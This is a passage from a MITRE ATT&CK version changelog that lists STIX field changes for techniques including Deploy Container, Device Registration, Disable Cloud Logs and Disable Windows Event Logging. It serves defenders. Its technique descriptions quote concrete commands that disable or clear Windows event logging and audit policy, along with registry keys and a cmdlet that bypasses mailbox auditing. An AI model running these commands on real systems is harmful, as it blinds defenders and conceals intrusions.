Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system. One such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016) Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2
iterable_item_added
STIX Field | Old value | New value
x_mitre_data_sources | | Process: Process Creation
iterable_item_removed
STIX Field | Old value | New value
x_mitre_data_sources | Process: Process Creation |

[T1610] Deploy Container

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.1.0
x_mitre_deprecated | | False
dictionary_item_removed
STIX Field | Old value | New value
x_mitre_permissions_required | ['User', 'root'] |
values_changed
STIX Field | Old value | New value
modified | 2022-04-01 13:14:58.939000+00:00 | 2023-04-15 16:13:40.232000+00:00
external_references[1]['source_name'] | Docker Containers API | Aqua Build Images on Hosts
external_references[1]['description'] | Docker. (n.d.). Docker Engine API v1.41 Reference - Container. Retrieved March 29, 2021. | Assaf Morag. (2020, July 15). Threat Alert: Attackers Building Malicious Images on Your Hosts. Retrieved March 29, 2021.
external_references[1]['url'] | https://docs.docker.com/engine/api/v1.41/#tag/Container | https://blog.aquasec.com/malicious-container-image-docker-container-host
external_references[2]['source_name'] | Kubernetes Dashboard | Docker Containers API
external_references[2]['description'] | The Kubernetes Authors. (n.d.). Kubernetes Web UI (Dashboard). Retrieved March 29, 2021. | Docker. (n.d.). Docker Engine API v1.41 Reference - Container. Retrieved March 29, 2021.
external_references[2]['url'] | https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/ | https://docs.docker.com/engine/api/v1.41/#tag/Container
external_references[4]['source_name'] | Aqua Build Images on Hosts | Kubernetes Dashboard
external_references[4]['description'] | Assaf Morag. (2020, July 15). Threat Alert: Attackers Building Malicious Images on Your Hosts. Retrieved March 29, 2021. | The Kubernetes Authors. (n.d.). Kubernetes Web UI (Dashboard). Retrieved March 29, 2021.
external_references[4]['url'] | https://blog.aquasec.com/malicious-container-image-docker-container-host | https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/
x_mitre_data_sources[1] | Container: Container Creation | Application Log: Application Log Content
x_mitre_data_sources[3] | Application Log: Application Log Content | Container: Container Creation
x_mitre_version | 1.1 | 1.2

[T1098.005] Account Manipulation: Device Registration

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance. MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) Similarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537) Devices registered in Azure AD may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Azure AD tenant by registering a large number of devices.(Citation: AADInternals - BPRT)

New Description
Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance. MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) In some cases, the MFA self-enrollment process may require only a username and password to enroll the account's first device or to enroll a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022) Similarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537) Devices registered in Azure AD may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Azure AD tenant by registering a large number of devices.(Citation: AADInternals - BPRT)

Details
values_changed
STIX Field | Old value | New value
modified | 2022-04-25 16:26:53.204000+00:00 | 2023-04-20 18:14:17.197000+00:00
description | Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance. MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) Similarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537) Devices registered in Azure AD may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Azure AD tenant by registering a large number of devices.(Citation: AADInternals - BPRT) | Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance. MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) In some cases, the MFA self-enrollment process may require only a username and password to enroll the account's first device or to enroll a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022) Similarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537) Devices registered in Azure AD may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Azure AD tenant by registering a large number of devices.(Citation: AADInternals - BPRT)
external_references[2]['source_name'] | AADInternals - Conditional Access Bypass | Mandiant APT29 Microsoft 365 2022
external_references[2]['description'] | Dr. Nestori Syynimaa. (2020, September 6). Bypassing conditional access by faking device compliance. Retrieved March 4, 2022. | Douglas Bienstock. (2022, August 18). You Can’t Audit Me: APT29 Continues Targeting Microsoft 365. Retrieved February 23, 2023.
external_references[2]['url'] | https://o365blog.com/post/mdm | https://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft
external_references[3]['source_name'] | AADInternals - BPRT | AADInternals - Conditional Access Bypass
external_references[3]['description'] | Dr. Nestori Syynimaa. (2021, January 31). BPRT unleashed: Joining multiple devices to Azure AD and Intune. Retrieved March 4, 2022. | Dr. Nestori Syynimaa. (2020, September 6). Bypassing conditional access by faking device compliance. Retrieved March 4, 2022.
external_references[3]['url'] | https://o365blog.com/post/bprt/ | https://o365blog.com/post/mdm
external_references[4]['source_name'] | AADInternals - Device Registration | AADInternals - BPRT
external_references[4]['description'] | Dr. Nestori Syynimaa. (2021, March 3). Deep-dive to Azure AD device join. Retrieved March 9, 2022. | Dr. Nestori Syynimaa. (2021, January 31). BPRT unleashed: Joining multiple devices to Azure AD and Intune. Retrieved March 4, 2022.
external_references[4]['url'] | https://o365blog.com/post/devices/ | https://o365blog.com/post/bprt/
external_references[5]['source_name'] | DarkReading FireEye SolarWinds | AADInternals - Device Registration
external_references[5]['description'] | Kelly Jackson Higgins. (2021, January 7). FireEye's Mandia: 'Severity-Zero Alert' Led to Discovery of SolarWinds Attack. Retrieved April 18, 2022. | Dr. Nestori Syynimaa. (2021, March 3). Deep-dive to Azure AD device join. Retrieved March 9, 2022.
external_references[5]['url'] | https://www.darkreading.com/threat-intelligence/fireeye-s-mandia-severity-zero-alert-led-to-discovery-of-solarwinds-attack | https://o365blog.com/post/devices/
external_references[6]['source_name'] | Microsoft - Device Registration | DarkReading FireEye SolarWinds
external_references[6]['description'] | Microsoft 365 Defender Threat Intelligence Team. (2022, January 26). Evolved phishing: Device registration trick adds to phishers’ toolbox for victims without MFA. Retrieved March 4, 2022. | Kelly Jackson Higgins. (2021, January 7). FireEye's Mandia: 'Severity-Zero Alert' Led to Discovery of SolarWinds Attack. Retrieved April 18, 2022.
external_references[6]['url'] | https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa | https://www.darkreading.com/threat-intelligence/fireeye-s-mandia-severity-zero-alert-led-to-discovery-of-solarwinds-attack
external_references[7]['source_name'] | Microsoft DEV-0537 | Microsoft - Device Registration
external_references[7]['description'] | Microsoft. (2022, March 22). DEV-0537 criminal actor targeting organizations for data exfiltration and destruction. Retrieved March 23, 2022. | Microsoft 365 Defender Threat Intelligence Team. (2022, January 26). Evolved phishing: Device registration trick adds to phishers’ toolbox for victims without MFA. Retrieved March 4, 2022.
external_references[7]['url'] | https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ | https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[0] | User Account: User Account Modification | Active Directory: Active Directory Object Creation
x_mitre_data_sources[1] | Active Directory: Active Directory Object Creation | User Account: User Account Modification
x_mitre_version | 1.0 | 1.1
iterable_item_added
STIX Field | Old value | New value
external_references | | {'source_name': 'Microsoft DEV-0537', 'description': 'Microsoft. (2022, March 22). DEV-0537 criminal actor targeting organizations for data exfiltration and destruction. Retrieved March 23, 2022.', 'url': 'https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/'}
x_mitre_contributors | | Joe Gumke, U.S. Bank

[T1562.008] Impair Defenses: Disable Cloud Logs

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic)

New Description
An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the `Set-MailboxAuditBypassAssociation` cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)

New Detections:

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.1.0
x_mitre_deprecated | | False
dictionary_item_removed
STIX Field | Old value | New value
x_mitre_permissions_required | ['User'] |
values_changed
STIX Field | Old value | New value
modified | 2022-03-08 21:55:27.505000+00:00 | 2023-04-20 18:13:50.277000+00:00
description | An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) | An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the `Set-MailboxAuditBypassAssociation` cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)
external_references[1]['source_name'] | Following the CloudTrail: Generating strong AWS security signals with Sumo Logic | Stopping CloudTrail from Sending Events to CloudWatch Logs
external_references[1]['description'] | Dan Whalen. (2019, September 10). Following the CloudTrail: Generating strong AWS security signals with Sumo Logic. Retrieved October 16, 2020. | Amazon Web Services. (n.d.). Stopping CloudTrail from Sending Events to CloudWatch Logs. Retrieved October 16, 2020.
external_references[1]['url'] | https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/ | https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cloudwatch-logs.html
external_references[2]['source_name'] | Stopping CloudTrail from Sending Events to CloudWatch Logs | Following the CloudTrail: Generating strong AWS security signals with Sumo Logic
external_references[2]['description'] | Amazon Web Services. (n.d.). Stopping CloudTrail from Sending Events to CloudWatch Logs. Retrieved October 16, 2020. | Dan Whalen. (2019, September 10). Following the CloudTrail: Generating strong AWS security signals with Sumo Logic. Retrieved October 16, 2020.
external_references[2]['url'] | https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cloudwatch-logs.html | https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/
external_references[4]['source_name'] | az monitor diagnostic-settings | Dark Reading Microsoft 365 Attacks 2021
external_references[4]['description'] | Microsoft. (n.d.). az monitor diagnostic-settings. Retrieved October 16, 2020. | Kelly Sheridan. (2021, August 5). Incident Responders Explore Microsoft 365 Attacks in the Wild. Retrieved March 17, 2023.
external_references[4]['url'] | https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest#az_monitor_diagnostic_settings_delete | https://www.darkreading.com/threat-intelligence/incident-responders-explore-microsoft-365-attacks-in-the-wild/d/d-id/1341591
x_mitre_detection | Monitor logs for API calls to disable logging. In AWS, monitor for: StopLogging and DeleteTrail.(Citation: Stopping CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: google.logging.v2.ConfigServiceV2.UpdateSink.(Citation: Configuring Data Access audit logs) In Azure, monitor for az monitor diagnostic-settings delete.(Citation: az monitor diagnostic-settings) Additionally, a sudden loss of a log source may indicate that it has been disabled. | Monitor logs for API calls to disable logging. In AWS, monitor for: StopLogging and DeleteTrail.(Citation: Stopping CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: google.logging.v2.ConfigServiceV2.UpdateSink.(Citation: Configuring Data Access audit logs) In Azure, monitor for az monitor diagnostic-settings delete.(Citation: az monitor diagnostic-settings) Additionally, a sudden loss of a log source may indicate that it has been disabled.
x_mitre_version | 1.2 | 1.3
iterable_item_added
STIX Field | Old value | New value
external_references | | {'source_name': 'az monitor diagnostic-settings', 'description': 'Microsoft. (n.d.). az monitor diagnostic-settings. Retrieved October 16, 2020.', 'url': 'https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest#az_monitor_diagnostic_settings_delete'}
x_mitre_contributors | | Joe Gumke, U.S. Bank
x_mitre_data_sources | | User Account: User Account Modification
x_mitre_platforms | | SaaS
x_mitre_platforms | | Google Workspace
x_mitre_platforms | | Azure AD
x_mitre_platforms | | Office 365

[T1562.002] Impair Defenses: Disable Windows Event Logging

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description

Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections. The EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to <code>Security Settings\Local Policies\Audit Policy</code> for basic audit policy settings or <code>Security Settings\Advanced Audit Policy Configuration</code> for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) <code>auditpol.exe</code> may also be used to set audit policies.(Citation: auditpol) Adversaries may target system-wide logging or just that of a particular application. For example, the EventLog service may be disabled using the following PowerShell line: <code>Stop-Service -Name EventLog</code>.(Citation: Disable_Win_Event_Logging) Additionally, adversaries may use <code>auditpol</code> and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the <code>/success</code> or <code>/failure</code> parameters. For example, <code>auditpol /set /category:”Account Logon” /success:disable /failure:disable</code> turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: <code>auditpol /clear /y</code> or <code>auditpol /remove /allusers</code>.(Citation: T1562.002_redcanaryco) By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.

New Description

Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections. The EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to <code>Security Settings\Local Policies\Audit Policy</code> for basic audit policy settings or <code>Security Settings\Advanced Audit Policy Configuration</code> for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) <code>auditpol.exe</code> may also be used to set audit policies.(Citation: auditpol) Adversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the <code>Set-Service -Name EventLog -Status Stopped</code> or <code>sc config eventlog start=disabled</code> commands (followed by manually stopping the service using <code>Stop-Service -Name EventLog</code>).(Citation: Disable_Win_Event_Logging)(Citation: disable_win_evt_logging) Additionally, the service may be disabled by modifying the “Start” value in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog</code> then restarting the system for the change to take effect.(Citation: disable_win_evt_logging) There are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the "Start" value in the key <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Security</code>, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) Second, with Administrator privilege, adversaries may modify the same values in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System</code> and <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Application</code> to disable the entire EventLog.(Citation: disable_win_evt_logging) Additionally, adversaries may use <code>auditpol</code> and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the <code>/success</code> or <code>/failure</code> parameters. For example, <code>auditpol /set /category:”Account Logon” /success:disable /failure:disable</code> turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: <code>auditpol /clear /y</code> or <code>auditpol /remove /allusers</code>.(Citation: T1562.002_redcanaryco) By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.
Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.1.0
x_mitre_deprecated | | False
dictionary_item_removed
STIX Field | Old value | New value
x_mitre_permissions_required | ['Administrator'] |
values_changed
STIX Field | Old value | New value
modified | 2021-10-19 13:37:30.534000+00:00 | 2023-03-17 23:24:19.730000+00:00
description | Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections. The EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\Local Policies\Audit Policy for basic audit policy settings or Security Settings\Advanced Audit Policy Configuration for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol) Adversaries may target system-wide logging or just that of a particular application. For example, the EventLog service may be disabled using the following PowerShell line: Stop-Service -Name EventLog.(Citation: Disable_Win_Event_Logging) Additionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. For example, auditpol /set /category:”Account Logon” /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco) By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind. | Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections. The EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\Local Policies\Audit Policy for basic audit policy settings or Security Settings\Advanced Audit Policy Configuration for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol) Adversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the Set-Service -Name EventLog -Status Stopped or sc config eventlog start=disabled commands (followed by manually stopping the service using Stop-Service -Name EventLog).(Citation: Disable_Win_Event_Logging)(Citation: disable_win_evt_logging) Additionally, the service may be disabled by modifying the “Start” value in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog then restarting the system for the change to take effect.(Citation: disable_win_evt_logging) There are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the "Start" value in the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Security, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) Second, with Administrator privilege, adversaries may modify the same values in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System and HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Application to disable the entire EventLog.(Citation: disable_win_evt_logging) Additionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. For example, auditpol /set /category:”Account Logon” /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco) By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.
external_references[1]['source_name'] | Windows Log Events | Disable_Win_Event_Logging
external_references[1]['description'] | Franklin Smith. (n.d.). Windows Security Log Events. Retrieved February 21, 2020. | dmcxblue. (n.d.). Disable Windows Event Logging. Retrieved September 10, 2021.
external_references[1]['url'] | https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/ | https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging
external_references[2]['source_name'] | EventLog_Core_Technologies | def_ev_win_event_logging
external_references[2]['description'] | Core Technologies. (2021, May 24). Essential Windows Services: EventLog / Windows Event Log. Retrieved September 14, 2021. | Chandel, R. (2021, April 22). Defense Evasion: Windows Event Logging (T1562.002). Retrieved September 14, 2021.
external_references[2]['url'] | https://www.coretechnologies.com/blog/windows-services/eventlog/ | https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/
external_references[3]['source_name'] | Audit_Policy_Microsoft | EventLog_Core_Technologies
external_references[3]['description'] | Daniel Simpson. (2017, April 19). Audit Policy. Retrieved September 13, 2021. | Core Technologies. (2021, May 24). Essential Windows Services: EventLog / Windows Event Log. Retrieved September 14, 2021.
external_references[3]['url'] | https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policy | https://www.coretechnologies.com/blog/windows-services/eventlog/
external_references[4]['source_name'] | Advanced_sec_audit_policy_settings | Audit_Policy_Microsoft
external_references[4]['description'] | Simpson, D. et al. (2017, April 19). Advanced security audit policy settings. Retrieved September 14, 2021. | Daniel Simpson. (2017, April 19). Audit Policy. Retrieved September 13, 2021.
external_references[4]['url'] | https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings | https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policy
external_references[5]['source_name'] | auditpol | Windows Log Events
external_references[5]['description'] | Jason Gerend, et al. (2017, October 16). auditpol. Retrieved September 1, 2021. | Franklin Smith. (n.d.). Windows Security Log Events. Retrieved February 21, 2020.
external_references[5]['url'] | https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol | https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/
external_references[6]['source_name'] | Disable_Win_Event_Logging | disable_win_evt_logging
external_references[6]['description'] | dmcxblue. (n.d.). Disable Windows Event Logging. Retrieved September 10, 2021. | Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.
external_references[6]['url'] | https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging | https://ptylu.github.io/content/report/report.html?report=25
external_references[7]['source_name'] | auditpol.exe_STRONTIC | auditpol
external_references[7]['description'] | STRONTIC. (n.d.). auditpol.exe. Retrieved September 9, 2021. | Jason Gerend, et al. (2017, October 16). auditpol. Retrieved September 1, 2021.
external_references[7]['url'] | https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html | https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol
external_references[8]['source_name'] | T1562.002_redcanaryco | winser19_file_overwrite_bug_twitter
external_references[8]['description'] | redcanaryco. (2021, September 3). T1562.002 - Disable Windows Event Logging. Retrieved September 13, 2021. | Naceri, A. (2021, November 7). Windows Server 2019 file overwrite bug. Retrieved April 7, 2022.
external_references[8]['url'] | https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md | https://web.archive.org/web/20211107115646/https://twitter.com/klinix5/status/1457316029114327040
external_references[9]['source_name'] | def_ev_win_event_logging | T1562.002_redcanaryco
external_references[9]['description'] | Chandel, R. (2021, April 22). Defense Evasion: Windows Event Logging (T1562.002). Retrieved September 14, 2021. | redcanaryco. (2021, September 3). T1562.002 - Disable Windows Event Logging. Retrieved September 13, 2021.
external_references[9]['url'] | https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/ | https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md
external_references[10]['source_name'] | evt_log_tampering | Advanced_sec_audit_policy_settings
external_references[10]['description'] | svch0st. (2020, September 30). Event Log Tampering Part 1: Disrupting the EventLog Service. Retrieved September 14, 2021. | Simpson, D. et al. (2017, April 19). Advanced security audit policy settings. Retrieved September 14, 2021.
external_references[10]['url'] | https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c | https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings
x_mitre_data_sources[0] | Command: Command Execution | Sensor Health: Host Status
x_mitre_data_sources[1] | Sensor Health: Host Status | Script: Script Execution
x_mitre_data_sources[3] | Script: Script Execution | Windows Registry: Windows Registry Key Creation
x_mitre_data_sources[5] | Windows Registry: Windows Registry Key Creation | Command: Command Execution
x_mitre_version | 1.1 | 1.2
iterable_item_added
STIX Field | Old value | New value
